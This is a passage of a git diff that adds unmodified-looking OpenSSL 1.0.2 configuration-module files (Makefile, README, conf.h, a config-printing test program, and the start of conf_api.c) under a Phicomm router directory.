diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/conf/Makefile.save b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/conf/Makefile.save
new file mode 100644
index 0000000..756f1f2
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/conf/Makefile.save
@@ -0,0 +1,146 @@
+#
+# OpenSSL/crypto/conf/Makefile
+#
+
+DIR=	conf
+TOP=	../..
+CC=	cc
+INCLUDES= -I.. -I$(TOP) -I../../include
+CFLAG=-g
+MAKEFILE=	Makefile
+AR=		ar r
+
+CFLAGS= $(INCLUDES) $(CFLAG)
+
+GENERAL=Makefile
+TEST=
+APPS=
+
+LIB=$(TOP)/libcrypto.a
+LIBSRC= conf_err.c conf_lib.c conf_api.c conf_def.c conf_mod.c \
+	 conf_mall.c conf_sap.c
+
+LIBOBJ=	conf_err.o conf_lib.o conf_api.o conf_def.o conf_mod.o \
+	conf_mall.o conf_sap.o
+
+SRC= $(LIBSRC)
+
+EXHEADER= conf.h conf_api.h
+HEADER=	conf_def.h $(EXHEADER)
+
+ALL=    $(GENERAL) $(SRC) $(HEADER)
+
+top:
+	(cd ../..; $(MAKE) DIRS=crypto SDIRS=$(DIR) sub_all)
+
+all:	lib
+
+lib:	$(LIBOBJ)
+	$(AR) $(LIB) $(LIBOBJ)
+	$(RANLIB) $(LIB) || echo Never mind.
+	@touch lib
+
+files:
+	$(PERL) $(TOP)/util/files.pl Makefile >> $(TOP)/MINFO
+
+links:
+	@$(PERL) $(TOP)/util/mklink.pl ../../include/openssl $(EXHEADER)
+	@$(PERL) $(TOP)/util/mklink.pl ../../test $(TEST)
+	@$(PERL) $(TOP)/util/mklink.pl ../../apps $(APPS)
+
+install:
+	@[ -n "$(INSTALLTOP)" ] # should be set by top Makefile...
+	@headerlist="$(EXHEADER)"; for i in $$headerlist ; \
+	do  \
+	(cp $$i $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i; \
+	chmod 644 $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i ); \
+	done;
+
+tags:
+	ctags $(SRC)
+
+tests:
+
+lint:
+	lint -DLINT $(INCLUDES) $(SRC)>fluff
+
+depend:
+	@[ -n "$(MAKEDEPEND)" ] # should be set by upper Makefile...
+	$(MAKEDEPEND) -- $(CFLAG) $(INCLUDES) $(DEPFLAG) -- $(LIBSRC)
+
+dclean:
+	$(PERL) -pe 'if (/^# DO NOT DELETE THIS LINE/) {print; exit(0);}' $(MAKEFILE) >Makefile.new
+	mv -f Makefile.new $(MAKEFILE)
+
+clean:
+	rm -f *.o *.obj lib tags core .pure .nfs* *.old *.bak fluff
+
+# DO NOT DELETE THIS LINE -- make depend depends on it.
+
+conf_api.o: ../../e_os.h ../../include/openssl/bio.h
+conf_api.o: ../../include/openssl/conf.h ../../include/openssl/conf_api.h
+conf_api.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+conf_api.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+conf_api.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+conf_api.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+conf_api.o: ../../include/openssl/symhacks.h conf_api.c
+conf_def.o: ../../e_os.h ../../include/openssl/bio.h
+conf_def.o: ../../include/openssl/buffer.h ../../include/openssl/conf.h
+conf_def.o: ../../include/openssl/conf_api.h ../../include/openssl/crypto.h
+conf_def.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+conf_def.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+conf_def.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+conf_def.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+conf_def.o: ../../include/openssl/symhacks.h ../cryptlib.h conf_def.c
+conf_def.o: conf_def.h
+conf_err.o: ../../include/openssl/bio.h ../../include/openssl/conf.h
+conf_err.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+conf_err.o: ../../include/openssl/err.h ../../include/openssl/lhash.h
+conf_err.o: ../../include/openssl/opensslconf.h
+conf_err.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+conf_err.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+conf_err.o: ../../include/openssl/symhacks.h conf_err.c
+conf_lib.o: ../../include/openssl/bio.h ../../include/openssl/conf.h
+conf_lib.o: ../../include/openssl/conf_api.h ../../include/openssl/crypto.h
+conf_lib.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+conf_lib.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+conf_lib.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+conf_lib.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+conf_lib.o: ../../include/openssl/symhacks.h conf_lib.c
+conf_mall.o: ../../e_os.h ../../include/openssl/asn1.h
+conf_mall.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+conf_mall.o: ../../include/openssl/conf.h ../../include/openssl/crypto.h
+conf_mall.o: ../../include/openssl/dso.h ../../include/openssl/e_os2.h
+conf_mall.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+conf_mall.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+conf_mall.o: ../../include/openssl/objects.h
+conf_mall.o: ../../include/openssl/opensslconf.h
+conf_mall.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+conf_mall.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+conf_mall.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+conf_mall.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+conf_mall.o: ../../include/openssl/x509_vfy.h ../cryptlib.h conf_mall.c
+conf_mod.o: ../../e_os.h ../../include/openssl/asn1.h
+conf_mod.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+conf_mod.o: ../../include/openssl/conf.h ../../include/openssl/crypto.h
+conf_mod.o: ../../include/openssl/dso.h ../../include/openssl/e_os2.h
+conf_mod.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+conf_mod.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+conf_mod.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+conf_mod.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+conf_mod.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+conf_mod.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+conf_mod.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+conf_mod.o: ../../include/openssl/x509_vfy.h ../cryptlib.h conf_mod.c
+conf_sap.o: ../../e_os.h ../../include/openssl/asn1.h
+conf_sap.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+conf_sap.o: ../../include/openssl/conf.h ../../include/openssl/crypto.h
+conf_sap.o: ../../include/openssl/dso.h ../../include/openssl/e_os2.h
+conf_sap.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+conf_sap.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+conf_sap.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+conf_sap.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+conf_sap.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+conf_sap.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+conf_sap.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+conf_sap.o: ../../include/openssl/x509_vfy.h ../cryptlib.h conf_sap.c
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/conf/README b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/conf/README
new file mode 100644
index 0000000..96e53b3
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/conf/README
@@ -0,0 +1,73 @@
+Configuration modules. These are a set of modules which can perform
+various configuration functions.
+
+Currently the routines should be called at most once when an application
+starts up: that is before it starts any threads.
+
+The routines read a configuration file set up like this:
+
+-----
+#default section
+openssl_conf=init_section
+
+[init_section]
+
+module1=value1
+#Second instance of module1
+module1.1=valueX
+module2=value2
+module3=dso_literal
+module4=dso_section
+
+[dso_section]
+
+path=/some/path/to/some/dso.so
+other_stuff=other_value
+----
+
+When this file is loaded a configuration module with the specified string
+(module* in the above example) is looked up and its init function called as:
+
+int conf_init_func(CONF_IMODULE *md, CONF *cnf);
+
+The function can then take whatever action is appropriate, for example further
+lookups based on the value. Multiple instances of the same config module can be
+loaded.
+
+When the application closes down the modules are cleaned up by calling an
+optional finish function:
+
+void conf_finish_func(CONF_IMODULE *md);
+
+The finish functions are called in reverse order: that is the last module
+loaded is the first one cleaned up.
+
+If no module exists with a given name then an attempt is made to load a DSO
+with the supplied name. This might mean that "module3" attempts to load a DSO
+called libmodule3.so or module3.dll for example. An explicit DSO name can be
+given by including a separate section as in the module4 example above.
+
+The DSO is expected to at least contain an initialization function:
+
+int OPENSSL_init(CONF_IMODULE *md, CONF *cnf);
+
+and may also include a finish function:
+
+void OPENSSL_finish(CONF_IMODULE *md);
+
+Static modules can also be added using,
+
+int CONF_module_add(char *name, dso_mod_init_func *ifunc, dso_mod_finish_func
+*ffunc);
+
+where "name" is the name in the configuration file this function corresponds
+to.
+
+A set of builtin modules (currently only an ASN1 non functional test module)
+can be added by calling OPENSSL_load_builtin_modules(). 
+
+The function OPENSSL_config() is intended as a simple configuration function
+that any application can call to perform various default configuration tasks.
+It uses the file openssl.cnf in the usual locations.
+
+
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/conf/cnf_save.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/conf/cnf_save.c
new file mode 100644
index 0000000..71c4317
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/conf/cnf_save.c
@@ -0,0 +1,104 @@
+/* crypto/conf/cnf_save.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include <openssl/conf.h>
+
+static void print_conf(CONF_VALUE *cv);
+static IMPLEMENT_LHASH_DOALL_FN(print_conf, CONF_VALUE *);
+
+main()
+{
+    LHASH *conf;
+    long l;
+
+    conf = CONF_load(NULL, "../../apps/openssl.cnf", &l);
+    if (conf == NULL) {
+        fprintf(stderr, "error loading config, line %ld\n", l);
+        exit(1);
+    }
+
+    lh_doall(conf, LHASH_DOALL_FN(print_conf));
+}
+
+static void print_conf(CONF_VALUE *cv)
+{
+    int i;
+    CONF_VALUE *v;
+    char *section;
+    char *name;
+    char *value;
+    STACK *s;
+
+    /* If it is a single entry, return */
+
+    if (cv->name != NULL)
+        return;
+
+    printf("[ %s ]\n", cv->section);
+    s = (STACK *) cv->value;
+
+    for (i = 0; i < sk_num(s); i++) {
+        v = (CONF_VALUE *)sk_value(s, i);
+        section = (v->section == NULL) ? "None" : v->section;
+        name = (v->name == NULL) ? "None" : v->name;
+        value = (v->value == NULL) ? "None" : v->value;
+        printf("%s=%s\n", name, value);
+    }
+    printf("\n");
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/conf/conf.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/conf/conf.h
new file mode 100644
index 0000000..8d926d5
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/conf/conf.h
@@ -0,0 +1,267 @@
+/* crypto/conf/conf.h */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#ifndef  HEADER_CONF_H
+# define HEADER_CONF_H
+
+# include <openssl/bio.h>
+# include <openssl/lhash.h>
+# include <openssl/stack.h>
+# include <openssl/safestack.h>
+# include <openssl/e_os2.h>
+
+# include <openssl/ossl_typ.h>
+
+#ifdef  __cplusplus
+extern "C" {
+#endif
+
+typedef struct {
+    char *section;
+    char *name;
+    char *value;
+} CONF_VALUE;
+
+DECLARE_STACK_OF(CONF_VALUE)
+DECLARE_LHASH_OF(CONF_VALUE);
+
+struct conf_st;
+struct conf_method_st;
+typedef struct conf_method_st CONF_METHOD;
+
+struct conf_method_st {
+    const char *name;
+    CONF *(*create) (CONF_METHOD *meth);
+    int (*init) (CONF *conf);
+    int (*destroy) (CONF *conf);
+    int (*destroy_data) (CONF *conf);
+    int (*load_bio) (CONF *conf, BIO *bp, long *eline);
+    int (*dump) (const CONF *conf, BIO *bp);
+    int (*is_number) (const CONF *conf, char c);
+    int (*to_int) (const CONF *conf, char c);
+    int (*load) (CONF *conf, const char *name, long *eline);
+};
+
+/* Module definitions */
+
+typedef struct conf_imodule_st CONF_IMODULE;
+typedef struct conf_module_st CONF_MODULE;
+
+DECLARE_STACK_OF(CONF_MODULE)
+DECLARE_STACK_OF(CONF_IMODULE)
+
+/* DSO module function typedefs */
+typedef int conf_init_func (CONF_IMODULE *md, const CONF *cnf);
+typedef void conf_finish_func (CONF_IMODULE *md);
+
+# define CONF_MFLAGS_IGNORE_ERRORS       0x1
+# define CONF_MFLAGS_IGNORE_RETURN_CODES 0x2
+# define CONF_MFLAGS_SILENT              0x4
+# define CONF_MFLAGS_NO_DSO              0x8
+# define CONF_MFLAGS_IGNORE_MISSING_FILE 0x10
+# define CONF_MFLAGS_DEFAULT_SECTION     0x20
+
+int CONF_set_default_method(CONF_METHOD *meth);
+void CONF_set_nconf(CONF *conf, LHASH_OF(CONF_VALUE) *hash);
+LHASH_OF(CONF_VALUE) *CONF_load(LHASH_OF(CONF_VALUE) *conf, const char *file,
+                                long *eline);
+# ifndef OPENSSL_NO_FP_API
+LHASH_OF(CONF_VALUE) *CONF_load_fp(LHASH_OF(CONF_VALUE) *conf, FILE *fp,
+                                   long *eline);
+# endif
+LHASH_OF(CONF_VALUE) *CONF_load_bio(LHASH_OF(CONF_VALUE) *conf, BIO *bp,
+                                    long *eline);
+STACK_OF(CONF_VALUE) *CONF_get_section(LHASH_OF(CONF_VALUE) *conf,
+                                       const char *section);
+char *CONF_get_string(LHASH_OF(CONF_VALUE) *conf, const char *group,
+                      const char *name);
+long CONF_get_number(LHASH_OF(CONF_VALUE) *conf, const char *group,
+                     const char *name);
+void CONF_free(LHASH_OF(CONF_VALUE) *conf);
+int CONF_dump_fp(LHASH_OF(CONF_VALUE) *conf, FILE *out);
+int CONF_dump_bio(LHASH_OF(CONF_VALUE) *conf, BIO *out);
+
+void OPENSSL_config(const char *config_name);
+void OPENSSL_no_config(void);
+
+/*
+ * New conf code.  The semantics are different from the functions above. If
+ * that wasn't the case, the above functions would have been replaced
+ */
+
+struct conf_st {
+    CONF_METHOD *meth;
+    void *meth_data;
+    LHASH_OF(CONF_VALUE) *data;
+};
+
+CONF *NCONF_new(CONF_METHOD *meth);
+CONF_METHOD *NCONF_default(void);
+CONF_METHOD *NCONF_WIN32(void);
+# if 0                          /* Just to give you an idea of what I have in
+                                 * mind */
+CONF_METHOD *NCONF_XML(void);
+# endif
+void NCONF_free(CONF *conf);
+void NCONF_free_data(CONF *conf);
+
+int NCONF_load(CONF *conf, const char *file, long *eline);
+# ifndef OPENSSL_NO_FP_API
+int NCONF_load_fp(CONF *conf, FILE *fp, long *eline);
+# endif
+int NCONF_load_bio(CONF *conf, BIO *bp, long *eline);
+STACK_OF(CONF_VALUE) *NCONF_get_section(const CONF *conf,
+                                        const char *section);
+char *NCONF_get_string(const CONF *conf, const char *group, const char *name);
+int NCONF_get_number_e(const CONF *conf, const char *group, const char *name,
+                       long *result);
+int NCONF_dump_fp(const CONF *conf, FILE *out);
+int NCONF_dump_bio(const CONF *conf, BIO *out);
+
+# if 0                          /* The following function has no error
+                                 * checking, and should therefore be avoided */
+long NCONF_get_number(CONF *conf, char *group, char *name);
+# else
+#  define NCONF_get_number(c,g,n,r) NCONF_get_number_e(c,g,n,r)
+# endif
+
+/* Module functions */
+
+int CONF_modules_load(const CONF *cnf, const char *appname,
+                      unsigned long flags);
+int CONF_modules_load_file(const char *filename, const char *appname,
+                           unsigned long flags);
+void CONF_modules_unload(int all);
+void CONF_modules_finish(void);
+void CONF_modules_free(void);
+int CONF_module_add(const char *name, conf_init_func *ifunc,
+                    conf_finish_func *ffunc);
+
+const char *CONF_imodule_get_name(const CONF_IMODULE *md);
+const char *CONF_imodule_get_value(const CONF_IMODULE *md);
+void *CONF_imodule_get_usr_data(const CONF_IMODULE *md);
+void CONF_imodule_set_usr_data(CONF_IMODULE *md, void *usr_data);
+CONF_MODULE *CONF_imodule_get_module(const CONF_IMODULE *md);
+unsigned long CONF_imodule_get_flags(const CONF_IMODULE *md);
+void CONF_imodule_set_flags(CONF_IMODULE *md, unsigned long flags);
+void *CONF_module_get_usr_data(CONF_MODULE *pmod);
+void CONF_module_set_usr_data(CONF_MODULE *pmod, void *usr_data);
+
+char *CONF_get1_default_config_file(void);
+
+int CONF_parse_list(const char *list, int sep, int nospc,
+                    int (*list_cb) (const char *elem, int len, void *usr),
+                    void *arg);
+
+void OPENSSL_load_builtin_modules(void);
+
+/* BEGIN ERROR CODES */
+/*
+ * The following lines are auto generated by the script mkerr.pl. Any changes
+ * made after this point may be overwritten when the script is next run.
+ */
+void ERR_load_CONF_strings(void);
+
+/* Error codes for the CONF functions. */
+
+/* Function codes. */
+# define CONF_F_CONF_DUMP_FP                              104
+# define CONF_F_CONF_LOAD                                 100
+# define CONF_F_CONF_LOAD_BIO                             102
+# define CONF_F_CONF_LOAD_FP                              103
+# define CONF_F_CONF_MODULES_LOAD                         116
+# define CONF_F_CONF_PARSE_LIST                           119
+# define CONF_F_DEF_LOAD                                  120
+# define CONF_F_DEF_LOAD_BIO                              121
+# define CONF_F_MODULE_INIT                               115
+# define CONF_F_MODULE_LOAD_DSO                           117
+# define CONF_F_MODULE_RUN                                118
+# define CONF_F_NCONF_DUMP_BIO                            105
+# define CONF_F_NCONF_DUMP_FP                             106
+# define CONF_F_NCONF_GET_NUMBER                          107
+# define CONF_F_NCONF_GET_NUMBER_E                        112
+# define CONF_F_NCONF_GET_SECTION                         108
+# define CONF_F_NCONF_GET_STRING                          109
+# define CONF_F_NCONF_LOAD                                113
+# define CONF_F_NCONF_LOAD_BIO                            110
+# define CONF_F_NCONF_LOAD_FP                             114
+# define CONF_F_NCONF_NEW                                 111
+# define CONF_F_STR_COPY                                  101
+
+/* Reason codes. */
+# define CONF_R_ERROR_LOADING_DSO                         110
+# define CONF_R_LIST_CANNOT_BE_NULL                       115
+# define CONF_R_MISSING_CLOSE_SQUARE_BRACKET              100
+# define CONF_R_MISSING_EQUAL_SIGN                        101
+# define CONF_R_MISSING_FINISH_FUNCTION                   111
+# define CONF_R_MISSING_INIT_FUNCTION                     112
+# define CONF_R_MODULE_INITIALIZATION_ERROR               109
+# define CONF_R_NO_CLOSE_BRACE                            102
+# define CONF_R_NO_CONF                                   105
+# define CONF_R_NO_CONF_OR_ENVIRONMENT_VARIABLE           106
+# define CONF_R_NO_SECTION                                107
+# define CONF_R_NO_SUCH_FILE                              114
+# define CONF_R_NO_VALUE                                  108
+# define CONF_R_UNABLE_TO_CREATE_NEW_SECTION              103
+# define CONF_R_UNKNOWN_MODULE_NAME                       113
+# define CONF_R_VARIABLE_HAS_NO_VALUE                     104
+
+#ifdef  __cplusplus
+}
+#endif
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/conf/conf_api.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/conf/conf_api.c
new file mode 100644
index 0000000..4cf7553
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/conf/conf_api.c
@@ -0,0 +1,305 @@
+/* conf_api.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+/* Part of the code in here was originally in conf.c, which is now removed */
+
+#ifndef CONF_DEBUG
+# undef NDEBUG                  /* avoid conflicting definitions */
+# define NDEBUG
+#endif
+
+#include <assert.h>
+#include <stdlib.h>
+#include <string.h>
+#include <openssl/conf.h>
+#include <openssl/conf_api.h>
+#include "e_os.h"
+
+static void value_free_hash_doall_arg(CONF_VALUE *a,
+                                      LHASH_OF(CONF_VALUE) *conf);
+static void value_free_stack_doall(CONF_VALUE *a);
+static IMPLEMENT_LHASH_DOALL_ARG_FN(value_free_hash, CONF_VALUE,
+                                    LHASH_OF(CONF_VALUE))
+static IMPLEMENT_LHASH_DOALL_FN(value_free_stack, CONF_VALUE)
+
+/* Up until OpenSSL 0.9.5a, this was get_section */
+CONF_VALUE *_CONF_get_section(const CONF *conf, const char *section)
+{
+    CONF_VALUE *v, vv;
+
+    if ((conf == NULL) || (section == NULL))
+        return (NULL);
+    vv.name = NULL;
+    vv.section = (char *)section;
+    v = lh_CONF_VALUE_retrieve(conf->data, &vv);
+    return (v);
+}
+
+/* Up until OpenSSL 0.9.5a, this was CONF_get_section */
+STACK_OF(CONF_VALUE) *_CONF_get_section_values(const CONF *conf,
+                                               const char *section)
+{
+    CONF_VALUE *v;
+
+    v = _CONF_get_section(conf, section);
+    if (v != NULL)
+        return ((STACK_OF(CONF_VALUE) *)v->value);
+    else
+        return (NULL);
+}
+
+int _CONF_add_string(CONF *conf, CONF_VALUE *section, CONF_VALUE *value)
+{
+    CONF_VALUE *v = NULL;
